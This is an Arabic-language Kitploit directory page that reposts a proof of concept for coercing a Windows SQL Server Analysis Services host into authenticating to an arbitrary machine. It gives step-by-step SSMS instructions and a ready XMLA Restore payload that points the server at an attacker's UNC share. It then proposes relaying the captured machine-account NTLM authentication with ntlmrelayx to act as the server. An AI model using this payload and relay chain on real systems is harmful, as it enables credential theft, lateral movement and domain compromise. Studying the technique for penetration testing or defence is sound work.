Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
MSSQL-Analysis-Coerce — تقنية لإجبار خادم SQL Server على نظام ويندوز على المصادقة على جهاز آخر. | Kitploit
أدوات/GitHubGitHub/p0dalirius/mssql-analysis-coerce
الاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراقالفريق الأحمرالهجوم العدائي
GitHubp0dalirius/mssql-analysis-coerce

MSSQL-Analysis-Coerce

تقنية لإجبار خادم SQL Server على نظام ويندوز على المصادقة على جهاز آخر.

عرض المستودع
133135منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

MSSQL Analysis Services - Coerced Authentication

تقنية لإجبار خادم SQL Server على نظام ويندوز على المصادقة على جهاز عشوائي.

هذا الإثبات المفاهيمي من تأليف مشترك لكل من:

  • Podalirius: YouTube Channel Subscribers
  • Worty:

إثبات الفكرة

من أجل تحفيز المصادقة من حساب الجهاز المحلي، نحتاج إلى الاتصال بخادم SQL Server البعيد باستخدام بيانات اعتماد مستخدم:

ثم نختار "Restore" لاستعادة قاعدة البيانات من ملف معيّن.

لتوليد ملف XMLA، ضع المسار إلى ملف عشوائي في حقل "Backup File" ثم انقر فوق Ok.

ثم غيّر المسار إلى ملف عشوائي واستبدله بمسار UNC إلى خادم المهاجم (على سبيل المثال \\192.168.128\SYSVOL\db.abf)

استعلام XMLA الخاص بإثبات الفكرة (poc.xmla):

root@kitploit:~
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
    <File>\\192.168.2.51\SYSVOL\db.abf</File>
    <DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
    <DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>

ونحصل على مصادقة من حساب الجهاز المحلي لخادم SQL Server:

الترحيل (Relaying) للفوز

بمجرد حصولنا على المصادقة، يمكننا ترحيلها باستخدام ntlmrelayx لتنفيذ العديد من الإجراءات نيابةً عن جهاز الكمبيوتر SQL01$.

هذا أمر رائع، لكن من المعقد تحفيز هذه المصادقة القسرية من جهاز اختراق يعمل بنظام لينكس لأننا لا نملك وصولاً إلى SQL Server Management Studio (SSMS).

المراجع

  • https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
  • https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
  • https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html
تنزيل الأداة